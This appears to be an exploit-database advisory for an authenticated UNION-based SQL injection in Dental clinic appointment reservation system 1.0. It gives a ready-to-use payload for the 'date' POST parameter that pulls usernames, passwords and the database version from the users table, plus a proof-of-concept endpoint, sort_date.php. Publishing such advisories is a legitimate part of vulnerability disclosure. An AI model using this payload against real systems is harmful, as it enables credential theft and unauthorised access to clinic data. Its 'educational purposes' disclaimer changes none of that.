Dental clinic appointment reservation system 1.0 date union based sql injection (authenticated) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2021-05-13 |
Type : webapps |
Platform : php
This exploit / vulnerability Dental clinic appointment reservation system 1.0 date union based sql injection (authenticated) is for educational purposes only and if it is used you will do on your own risk!
# Description:
# the 'date' POST parameter is vulnerable to UNION-based SQL Injection
# Attacker can use it to retrieve sensitive data like usernames, passwords, versions, etc.
# payload: ' UNION SELECT NULL,NULL,@@version,username,password,NULL FROM users -- -
# Proof of concept:
http://localhost/admin/sort_date.php